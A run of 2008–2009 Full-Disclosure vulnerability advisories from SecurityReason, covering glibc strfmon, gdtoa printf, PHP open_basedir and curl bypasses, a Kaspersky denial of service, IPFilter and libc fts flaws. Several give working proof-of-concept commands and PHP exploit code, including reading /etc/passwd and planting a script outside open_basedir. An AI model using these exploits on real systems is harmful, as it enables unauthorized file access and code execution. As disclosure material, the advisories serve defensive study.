+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
level = cur->fts_level + 1;
/* Read the directory, attaching each entry to the `link' pointer. */
So let`s see /etc/rc.d/cleartmp (NetBSD 5.0.1). This script use rm(1) with rf
args.
Line 40-41:
find -x . ! -name . ! -name lost+found ! -name quota.user \
! -name quota.group -exec rm -rf -- {} \; -type d -prune)
here daemon will come to tmp_dir (/tmp) and wants clean it with the sequence
"[a-km-pr-zA-Z]*". It will kill this script anytime
when they will be started. So if we create directory "A" in /tmp, all other
files and directories in alphabetical order, will
not be delete.
Proof of Concept:
User cxib, have created exploit in main /tmp dir.
exploit:
127# cd /tmp && perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and
chdir $a }'
In /tmp we have
# ls -la
total 22
drwxrwxrwt 10 root wheel 512 Aug 11 01:18 .
drwxr-xr-x 27 root wheel 1024 Aug 11 00:09 ..
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
- -r--r--r-- 1 root wheel11 Aug 11 00:11 .X0-lock
drwxrwxrwt 2 root wheel 512 Aug 11 00:11 .X11-unix
- -rw-r--r-- 1 root wheel 0 Aug 11 01:18 A
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 B
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx-- 2 root wheel 512 Aug 11 00:49 kde-root
drwx-- 3 root wheel 512 Aug 11 01:14 ksocket-root
drwx-- 2 root wheel 512 Aug 11 00:11 mc-root
correct behavior will delete all files after reboot. So lets do it.
# reboot
Now we have in /tmp
# ls -la
total 18
drwxrwxrwt 9 root wheel 512 Aug 11 13:57 .
drwxr-xr-x 27 root wheel 1024 Aug 11 14:02 ..
drwxrwxrwx 2 root wheel 512 Aug 11 00:49 .ICE-unix
drwxrwxrwt 2 root wheel 512 Aug 11 01:19 .X11-unix
drwxr-xr-x 3 cxib wheel 512 Aug 6 01:43 CC
drwxr-xr-x 2 root wheel 512 Aug 11 01:15 D
- -rw-r--r-- 1 root wheel 0 Aug 11 01:16 chujwamwmuzg
drwx-- 2 root wheel 512 Aug 11 00:49 kde-root
drwx-- 3 root wheel 512 Aug 11 01:19 ksocket-root
drwx-- 2 root wheel 512 Aug 11 00:11 mc-root
file A and dir B has been deleted. But file chujwamwmuzg and directories
{D,Cx22} are still avaliable. To resolve, we can use
openbsd fix. However, this does not fully resolve the problem. The user can
create a direcory (like Cx22) that can not be
removed by rm(1).
To remove Cx22 folder, we can use program made by openbsd
- ---
#i
[Full-disclosure] SecurityReason: glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.03.2008
- - Pub.: 17.09.2009
CVE: CVE-2008-1391
Risk: High
Affected Software (tested 27.08.2009):
- - Fedora 11
- - Slackware 12.2
- - Ubuntu 9.04
- - others linux distributions
Original URL:
http://securityreason.com/achievement_securityalert/67
Previous URL:
http://securityreason.com/achievement_securityalert/53
- --- 0.Description ---
strfmon -- convert monetary value to string
The strfmon() function places characters into the array pointed to by s as
controlled by the string pointed to by format. No
more than maxsize bytes are placed into the array.
The format string is composed of zero or more directives: ordinary characters
(not %), which are copied unchanged to the output
stream; and
conversion specifications, each of which results in fetching zero or more
subsequent arguments. Each conversion specification is introduced by the %
character.
SYNOPSIS:
#include
ssize_t
strfmon(char * restrict s, size_t maxsize, const char * restrict
format,
...);
- --- 1. glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ---
In March 2008, our team has published a security note (SREASONRES:20080325)
about vulnerabilities in strfmon(3) function. Issue
has been officially diagnosed in NetBSD, FreeBSD and MacOSX. However, from the
source code due to a glibc also is vulnerable to.
We have informed glibc team. However, the description of the issue and fix was
not enough for gnu team. They has changed status
for BOGUS and response was:
- ---
And what exactly does an BSD implementation has to do with glibc?
- ---
Today we now, only NetBSD is secure for this. And all systems uses glibc are
affected. Despite the differences in the code
NetBSD libc and glibc, issue is the same but the exploit differs from that
presented in (SREASONRES:20080325).
Description of the vulnerabalitie:
http://securityreason.com/achievement_securityalert/53 (SREASONRES:20080325)
http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/
Description of the fix:
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-006.txt.asc
To present this issue in Fedora 11, we will use php client. money_format() use
strfmon(3) function so this program will be perfect.
[...@localhost ~]$ php -r 'money_format("%.1073741821i",1);'
Segmentation fault
for 'money_format("%.1073741821i",1);' we will get
Program received signal SIGSEGV, Segmentation fault.
0x0019331a in __printf_fp () from /lib/libc.so.6
(gdb) bt
#0 0x0019331a in __printf_fp () from /lib/libc.so.6
#1 0x0018832b in __vstrfmon_l () from /lib/libc.so.6
#2 0x00187a36 in strfmon () from /lib/libc.so.6
strfmon() will call to __printf_fp() with overflowed arg. In result
(gdb) x/20s ($esi)-10
0x8448ff6: ""
0x8448ff7: ""
0x8448ff8: "0"
0x8448ffa: ""
0x8448ffb: ""
0x8448ffc: "0"
0x8448ffe: ""
0x8448fff: ""
0x8449000:
0x8449000:
0x8449000:
...
(gdb) i r
eax0x30 48
ecx0x0 0
edx0x0 0
ebx0x2bdff4 2875380
esp0xbfffec14 0xbfffec14
ebp0xbfffed78 0xbfffed78
esi0x8449000138711040
edi0x810c 33036
eip0x19331a 0x19331a <__printf_fp+3274>
Now let's see what will hapen for 'money_format("%.1073741822i",1);'
Program received signal SIGSEGV, Segmentation fault.
0x0034b27b in hack_digit.12295 () from /lib/libc.so.6
php will crash in hack_digit().
(gdb) i r
eax0x3ffe 1073741822
ecx0x32 50
edx0x2 2
ebx0x476ff4 4681716
esp0xbfffebc4 0xbfffebc4
ebp0xbfffebf4 0xbfffebf4
esi0x32 50
edi0x3e 62
we can try change edi register.
For 'money_format("%.1073741824i",1);'
(gdb) i r
eax0x4000 1073741824
ecx0x32 50
edx0x2 2
ebx0x35bff4 3522548
esp0xbfffebbc 0xbfffebbc
ebp0xbfffebec 0xbfffebec
esi0x32 50
edi0x42 66
But let's see what will hapen for 'money_format("%.77715949976712904702i",
1.1);'
crash in
Program received signal SIGSEGV, Segmentation fault.
0x00e4327b in hack_digit.12295 () from /lib/libc.so.6
(gdb) i r
eax0x3ffe 1073741822
ecx0x34 52
edx0x2 2
ebx0xf6eff4 16183284
esp0xbfffebb4 0xbfffebb4
ebp0xbfffebe4 0xbfffebe4
esi0x34 52
edi0x3e 62
esi 52.
In
[Full-disclosure] Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Kaspersky AV/IS 2010 (avp.exe) Denial-of-Service ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 10.07.2009
- - Pub.: 19.08.2009
Risk: Medium
Affected Software (tested):
- - Kaspersky Internet Security 2010 9.0.0.459 (a) EN
- - Kaspersky Anti-Virus 2010 9.0.0.463 DE
Original URL:
http://securityreason.com/achievement_securityalert/66
- --- 0.Description ---
Kaspersky Lab is a computer security company, co-founded by Natalia
Kasperskaya and Eugene Kaspersky in 1997, offering anti-virus,
anti-spyware, anti-spam, and anti-intrusion products. Kaspersky Lab is a
privately held company headquartered in Moscow, Russia with regional
offices in Germany, France, the Netherlands, the UK, Poland, Romania,
Sweden, Japan, China, Korea and the USA.
- --- 1. Kaspersky AV/IS 2010 avp.exe Denial of Service ---
The main problem exists in parsing url addresses. If we give a lot of
dots, kaspersky avp.exe proccess, will get 100% of CPU and will block
trafic via browsers.
Relativistic time to return to normal behavior is very long. In
practice, when we give a large number of dots, kaspesky will not return
to normal behavior.
This example will denial access to the browser and other kaspersky
operations
http://lu.cxib.net/.[ .xY where 1024http://lu.cxib.net/..[ more dots ]">
The user who executed the code above, will be deprived of the
possibility of browsing and successive reset the kaspersky.
Tested on:
- - Kaspersky Internet Security 2010 9.0.0.459 (a) (EN) + Windows Vista
Enterprise (EN)
- - Kaspersky Anti-Virus 2010 9.0.0.463 (DE) + Windows XP Home Edition (DE)
0day (18.08.2009) exploit you can find:
http://securityreason.com/downloads/kaspersky.2010.dos.html
This script, will generate tags with different url lenght to block
kaspersky services.
However we can exploit this issue via html email. The method of attack
is simple. The victim need only refer to a faulty address.
- --- 2. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3
- --- 3. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d0t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.pl/
- --
Best Regards,
-
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
-BEGIN PGP SIGNATURE-
iEYEARECAAYFAkqLQqIACgkQpiCeOKaYa9aLxgCgy3FzzR5xPzU6QgoK1VpHpjur
paQAn3ku0sU5AzHjzjo3N0qq+Kywu7i1
=rQAP
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SECURITYREASON: PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - - Dis.: 10.07.2009
- - - Pub.: 06.08.2009
Risk: High
Affected Software:
- - - PHP 5.3.0
- - - PHP 5.2.10
Original URL:
http://securityreason.com/achievement_securityalert/65
- - --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
http://lu2.php.net/manual/en/function.ini-restore.php
ini_restore ? Restores the value of a configuration option
ini_restore ( string $varname )
- - --- 1. PHP 5.2.10/5.3.0 (zend_ini.c) Memory Disclosure ---
The main problem exist in restoring php config environments. To
demonstrate the problem, we need to declare variables via ini_set()
function. When we try use ini_restore(), variables in class PG() will
indicate any part of memory.
- - ---zend_ini.c---
static int zend_restore_ini_entry_cb(zend_ini_entry *ini_entry, int
stage TSRMLS_DC) /* {{{ */
{
if (ini_entry->modified) {
if (ini_entry->on_modify) {
zend_try {
/* even if on_modify bails out, we have to continue on with
restoring,
since there can be allocated variables that would be
freed on MM shutdown
and would lead to memory corruption later ini entry is
modified again */
ini_entry->on_modify(ini_entry, ini_entry->orig_value,
ini_entry->orig_value_length, ini_entry->mh_arg1, ini_entry->mh_arg2,
ini_entry->mh_arg3, stage TSRMLS_CC);
} zend_end_try();
}
if (ini_entry->value != ini_entry->orig_value) {
efree(ini_entry->value);
}
ini_entry->value = ini_entry->orig_value;
ini_entry->value_length = ini_entry->orig_value_length;
ini_entry->modified = 0;
ini_entry->orig_value = NULL;
ini_entry->orig_value_length = 0;
if (ini_entry->modifiable >= (1 << 3)) {
ini_entry->modifiable >>= 3;
}
}
return 0;
}
- - ---zend_ini.c---
Flag modified will be reset, and we can not considered modified variable.
We don't check value of ini_entry->on_modify() and PG() will be now out
of memory range.
To demonstrate this issue
- - ---example0 (5.2.10/5.3.0)---
127# uname -a && php -v
OpenBSD 127.cxib 4.6 GENERIC#0 i386
PHP 5.2.10 with Suhosin-Patch 0.9.7 (cli) (built: Jul 5 2009 21:43:12)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2009 Zend Technologies
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH
127# cat /var/www/www/sess.php
127# php /var/www/www/sess.php AAA
PHP Warning: session_start():
open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open($|456789ABCDEF/sess_c7lv2k3bndfi25mhohq0nm7s06, O_RDWR) failed: No
such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please
verify that the current setting of session.save_path is correct ($|ma:
no-cache) in Unknown on line 0
127# php /var/www/www/sess.php
PHP Warning: session_start():
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed:
No such file or directory (2) in /var/www/www/sess.php on line 5
PHP Warning: Unknown:
open(¤^j|456789ABCDEF/sess_o9urrs37iabfg3tqvjuh07c1l1, O_RDWR) failed:
No such file or directory (2) in Unknown on line 0
PHP Warning: Unknown: Failed to write session data (files). Please
verify that the current setting of session.save_path is correct (¤^j|ma:
no-cache) in Unknown on line 0
- - ---example0 (5.2.10/5.3.0)---
The main problem is started in ini_restore("session.save_path"). To show
this issue, we need use some function with PG() inside (like:
session_start()).
- - ---example1 (5.3.0)---
127# uname -mrs && php -v
NetBSD 5.0 i386
PHP 5.3.0 (cli) (built: Jul 15 2009 23:47:25)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyrght (c) 1998-2009 Zend Technologies
127# cat /www/file.php
127# php /www/file.php
PHP Warning: include(): open_basedir restriction in effect. File(B) is
not within the allowed path(s): (4?e»X?p») in /www/file.php on line 7
Warning: include(): open_basedir restriction in effect. File(B) is not
within the allowed path(s): (4?e»X?p») in /www/file.php on line 7
PHP Warning: include(B): failed to open stream: Operation not permitted
in /www/file.php on line 7
Warning: include(B): failed to open stream: Operation not permitted in
/www/file.php on line 7
PHP Warning: include(): Failed opening 'B' for inclusion
(include_path='.:/
[Full-disclosure] PHP 5.3.0 (main.c) open_basedir bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
- -BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.0 (main.c) open_basedir bypass ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - - Dis.: 26.05.2009
- - - Pub.: 06.08.2009
Risk: Medium
Affected Software:
PHP 5.3.0
Original URL:
http://securityreason.com/achievement_securityalert/64
- - --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
http://lu2.php.net/manual/en/mail.configuration.php
mail.log NULL PHP_INI_SYSTEM|PHP_INI_PERDIR Available
since PHP 5.3.0.
- - --- 1. PHP 5.3.0 (main.c) open_basedir bypass ---
The first issue exists in main/main.c
- - ---
STD_PHP_INI_ENTRY("mail.log",NULL,
PHP_INI_SYSTEM|PHP_INI_PERDIR,OnUpdateString,
mail_log,php_core_globals,core_globals)
- - ---
Access PHP_INI_PERDIR is accepted by .htaccess (Apache) or .user.ini (CGI).
Function OnUpdateString dosen't check open_basedir. To reason, we need
create new function OpUpdateMailLog, where open_basedir will be checked.
Exploit:
127# cat /www/home/cx/show.php
127# curl http://localhost/home/cx/show.php
/www/home/cx
127# cat /www/home/cx/set.php
127# curl http://localhost/home/cx/set.php
Warning: ini_set(): open_basedir restriction in effect.
File(/www/home/gpkc/tmp/) is not within the allowed path(s):
(/www/home/cx) in /www/home/cx/set.php on line 2
We need create .htaccess or .user.ini
for Apache SAPI:
127# echo 'php_value mail.log /www/home/gkpc/tmp/exploit.php' > ./.htaccess
for CGI:
127# echo 'mail.log = /www/home/gkpc/tmp/exploit.php' > ./.user.ini
and some file with mail() function inside. In header X-Mailer, we can
put some php code to execute in other open_basedir range, like:
127# cat /www/home/cx/runmail.php
http://securityreason.com';
$message = 'exploit';
$headers = 'From: s...@spam.c0m' . "\r\n" .
'Reply-To: s...@spam.c0m' . "\r\n" .
'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>
127# curl http://localhost/home/cx/runmail.php
127# ls -la /www/home/gkpc/tmp/exploit.php
- - -rw-r--r-- 1 www www 173 Jun 30 05:20 /www/home/gkpc/tmp/exploit.php
Finish!
Now we can exec evil script exploit.php via httpd.
127# curl http://localhost/home/gkpc/tmp/exploit.php
mail() on [/www/home/cx/runmail.php:9]: To: s...@spam.c0m -- Headers:
From: s...@spam.c0m Reply-To: s...@spam.c0m X-Mailer:
PHP/www/home/gkpc/5.3.0
exploit.php is now in open_basedir=/www/home/gkpc/ range.
- - --- 2. Fix ---
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/main/main.c
- - --- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3
- - --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securityreason [d00t>com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
- -BEGIN PGP SIGNATURE-
iEYEARECAAYFAkp7FY4ACgkQpiCeOKaYa9YP7ACeKLHh47A/PJo7oPducKF/Iu0N
SZMAn0dMdoqrEnwYZeB2KuzlCK7wc/rB
=jSMc
- -END PGP SIGNATURE-
-BEGIN PGP SIGNATURE-
iEYEARECAAYFAkp8K5kACgkQpiCeOKaYa9Yv0wCgulgKdIlAx8fErD+/f7Do/hbs
qpQAn3VloWZCINo3wmqt4+uIo/m3fO7c
=0K2+
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] SecurityReason: Multiple Vendors libc/gdtoa printf(3) Array Overrun
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Multiple Vendors libc/gdtoa printf(3) Array Overrun ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 25.06.2009
CVE: CVE-2009-0689
Risk: High
Affected Software (12.06.2009):
- - OpenBSD 4.5
- - NetBSD 5.0
- - FreeBSD 7.2/6.4
Original URL:
http://securityreason.com/achievement_securityalert/63
- --- 0.Description ---
Week after the release of new version OpenBSD and NetBSD, our research
team has checked a new implementation of gdtoa
http://openbsd.org/45.html
- ---
A new version of the gdtoa code has been integrated, bringing better C99
support to printf(3) and friends.
- ---
More:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/
- --- 1. Multiple Vendors libc/gdtoa printf(3) Array Overrun ---
The main problem exists in new dtoa implementation.
asprintf(3) will crash for asprintf(ssij, "%0.262159f",x)
where x != 0
the behavior is correct for 262158
Let's see:
(gdb) r
Starting program: /cxib/C/check
Program received signal SIGSEGV, Segmentation fault.
0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
(gdb) bt
#0 0x79d9 in __Balloc_D2A () from /usr/lib/libc.so.12
#1 0xbbbab6d7 in __rv_alloc_D2A () from /usr/lib/libc.so.12
#2 0xbbba8db5 in __dtoa () from /usr/lib/libc.so.12
#3 0xbbba671f in __vfprintf_unlocked () from /usr/lib/libc.so.12
#4 0xbbb882e1 in asprintf () from /usr/lib/libc.so.12
#5 0x08048706 in main () at check.c:6
Let's see src/lib/libc/gdtoa/gdtoaimp.h
- ---gdtoaimp.h---
...
#define Kmax 15
...
- ---gdtoaimp.h---
The maximum Kmax length is 15. If we give bigger value, like 17 (edi),
program will overrun freelist array. bss will have 0x1.
Correct reason (by NetBSD):
- ---gdtoaimp.h---
...
#define Kmax (sizeof(size_t) << 3)
...
- ---gdtoaimp.h---
What is wrong? This program will crash in
- --- src/lib/libc/gdtoa/misc.c ---
if ( (rv = freelist[k]) !=0) {
freelist[k] = rv->next;
}
else {
x = 1 << k;
#ifdef Omit_Private_Memory
rv = (Bigint *)MALLOC(sizeof(Bigint) + (x-1)*sizeof(ULong));
#else
len = (sizeof(Bigint) + (x-1)*sizeof(ULong) + sizeof(double) -
1)
/sizeof(double);
if ((double *)(pmem_next - private_mem + len) <= (double
*)PRIVATE_mem) {
rv = (Bigint*)(void *)pmem_next;
pmem_next += len;
}
else
rv = (Bigint*)MALLOC(len*sizeof(double));
#endif
if (rv == NULL)
return NULL;
rv->k = k;
rv->maxwds = x;
}
- --- src/lib/libc/gdtoa/misc.c ---
here
rv->k = k;
or
freelist[k] = rv->next;
A good example to show this issue is printf(1) program.
127# printf %1.262159f 1.1
Memory fault (core dumped)
127# printf %11.210999f
210911999111791199.510001001
esi = 0x12
edi = 0x1d
127# printf %11.200999f
220911999111791199.510001001
esi = 0x13
edi = 0x1d
we can manipulate esi reg.
127# printf %11.200999f
1267686681.10001
Program received signal SIGSEGV, Segmentation fault.
__Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:59
59 freelist[k] = rv->next;
(gdb) i r
eax0x20efdb04 552590084
ecx0x77ce2a9d 201029
edx0x0 0
ebx0x20eff654 552597076
esp0xcfbfc2b0 0xcfbfc2b0
ebp0xcfbfc2c8 0xcfbfc2c8
esi0x41414141 1094795585
edi0x1d 29
eip0xf59317 0xf59317
eflags 0x10206 66054
cs 0x2b 43
ss 0x33 51
ds 0x33 51
es 0x33 51
fs 0x33 51
gs 0x33 51
esi = 0x41414141
edi = 0x1d
1267686681 is value of esi reg.
program will crash in
freelist[k] = rv->next;
Example 0:
- --- chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;
- --- chujwamwmuzg.pl ---
Perl will crash with
esi = 0x41414141
edi = 0x15
Example 1:
127# php -r 'money_format("%0.262159n", 1.);'
Memory fault (core dumped)
Programs that allow you to enter/control format string, are vulnerable.
We believe that the OpenBSD source-tree have only printf(1) and perl(1)
affected.
Functions like printf(3), strfmon(3), fprintf(3), sprintf(3),
snprintf(3), asprintf(3), vprintf(3), vfprintf(3), vsprintf(3),
vsnprintf(3), vasprintf(3) and others, are vulnerable (with new gdtoa impl.)
Other languages are also affected ( printf in perl )
- --- 2. Fix ---
NetBSD fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gd
[Full-disclosure] IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com/
Date:
- - Dis.: 05.03.2009
- - Pub.: 22.05.2009
CVE: CVE-2009-1476
Risk: Low
Original URL:
http://securityreason.com/achievement_securityalert/62
- --- 0.Description ---
IPFilter is a software package that can be used to provide network
address translation (NAT) or firewall services. To use, it can either be
used as a loadable kernel module or incorporated into your UNIX kernel;
use as a loadable kernel module where possible is highly recommended.
Scripts are provided to install and patch system files, as required.
ippool - user interface to the IPFilter pools
Ippool is used to manage information stored in the IP pools subsystem of
IPFilter. Configuration file information may be parsed and loaded into
the kernel, currently configured pools removed or changed as well as
inspected.
- --- 1. IPFilter (ippool) 4.1.31 lib/load_http.c buffer overflow ---
The main problem exist in lib/load_http.c .
Let's see lib/load_http.c ( char buffer[1024] )
- ---
...
alist_t *
load_http(char *url)
{
int fd, len, left, port, endhdr, removed;
char *s, *t, *u, buffer[1024], *myurl;
alist_t *a, *rtop, *rbot;
struct sockaddr_in sin;
struct hostent *host;
/*
* More than this would just be absurd.
*/
if (strlen(url) > 512) {
fprintf(stderr, "load_http has a URL > 512 bytes?!\n");
return NULL;
}
fd = -1;
rtop = NULL;
rbot = NULL;
sprintf(buffer, "GET %s HTTP/1.0\r\n", url);
myurl = strdup(url);
if (myurl == NULL)
goto done;
s = myurl + 7;/* http:// */
t = strchr(s, '/');
if (t == NULL) {
fprintf(stderr, "load_http has a malformed URL '%s'\n", url);
free(myurl);
return NULL;
}
*t++ = '\0';
u = strchr(s, '@');
if (u != NULL)
s = u + 1;/* AUTH */
sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s);
...
- ---
0. buffer[] have only 1024 bytes,
1. url can't have more than 512 bytes,
2. url will be copied into buffer here:
sprintf(buffer, "GET %s HTTP/1.0\r\n", url);
and here (s is a host)
sprintf(buffer + strlen(buffer), "Host: %s\r\n\r\n", s);
so if the url have
512 = strlen(http:// A x504 /)
then into buffer will be put
strlen(GET HTTP/1.0\r\n) = 15
strlen(url) = 512
strlen(Host: \r\n\r\n)= 10
strlen(A x504) = 504
sum = 1041 bytes.
Any use of this function is a potential risk. Programs such as "ippool"
may be at risk.
- --- 2. Fix ---
NetBSD fix:
http://cvsweb.netbsd.org/bsdweb.cgi/src/dist/ipf/lib/load_http.c?only_with_tag=MAIN
- --- 3. Greets ---
Christos Zoulas
sp3x infospec chujwamwdupe pi3 and others
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (OpenBSD)
iEUEARECAAYFAkoWwlMACgkQpiCeOKaYa9Z40wCg3EMaEvfUd6w+CC16Xg9LOes8
RWAAmJecg/1hNPWd6z8oAtCHKi1z/B8=
=Ku9/
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PHP 5.2.9 curl safe_mode & open_basedir bypass
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.2.9 curl safe_mode & open_basedir bypass ]
Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 31.12.2008
- - Pub.: 10.04.2009
Original URL:
http://securityreason.com/achievement_securityalert/61
- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.
PHP supports libcurl, a library created by Daniel Stenberg, that allows
you to connect and communicate to many different types of servers with
many different types of protocols. libcurl currently supports the http,
https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also
supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this
can also be done with PHP's ftp extension), HTTP form based upload,
proxies, cookies, and user+password authentication.
- --- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass ---
The main problem exist in checking safe_mode & open_basedir for curl
functions. There is a difference between checking the access and the
implementation of the operations.
Example code:
curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd");
curl in the first place check safe_mode and open_basedir for
"file:etc/passwd"
/* realpath is ./file:/etc/passwd */
and in next step will read
"file:etc/passwd"
(without wrapper => /etc/passwd)
To attack, we need to cheat php by creating a virtual tree like
./file:/
./file:/etc/
./file:/etc/passwd/
Example for /etc/hosts :
./file:/
./file:/etc/
./file:/etc/hosts/
So if you execute the file as user X, we have to create special
subdirectories.
- ---EXAMPLE-EXPLOIT---
mkDIR("file:");
chdir("file:");
mkDIR("etc");
chdir("etc");
mkDIR("passwd");
chdir("..");
chdir("..");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_exec($ch);
curl_close($ch);
- ---EXAMPLE-EXPLOIT---
The previous changes, may contribute to this error in php 5.2.9.
We will discourages the use ( safe_mode & open_basedir ) as the main
security.
Exploit:
http://securityreason.com/achievement_exploitalert/11
- --- 2. Fix ---
Not use safe_mode and open_basedir like a main safety
- --- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3 schain and r.i.p. ladybms
- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (OpenBSD)
iEYEARECAAYFAknfVzEACgkQpiCeOKaYa9bB7wCfUGnETLIyNN1de0A/wwLumeAy
wHMAn3OiRiuKq9ZL4zM0YNH6ix+NSNtQ
=Hcjr
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] libc:fts_*():multiple vendors, Denial-of-service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[libc:fts_*():multiple vendors, Denial-of-service ]
Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 21.10.2008
- - Pub.: 04.03.2009
CVE: CVE-2009-0537
We are going informing all vendors, about this problem.
Affected Software (official):
- - OpenBSD 4.4
/usr/src/lib/libc/gen/fts.c
- - Microsoft Interix
6.0 10.0.6030.0 x86
- - Microsft Vista Enterprise
SearchIndexer.exe
probably more...
Original URL:
http://securityreason.com/achievement_securityalert/60
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is
then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one
of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of
structures, each of which describes one of the files contained in a
directory within the hierarchy.
typedef struct _ftsent {
unsigned short fts_info;/* flags for FTSENT
structure */
char *fts_accpath; /* access path */
char *fts_path; /* root path */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* file name */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level;/* depth (-1 to N) */
int fts_errno; /* file errno */
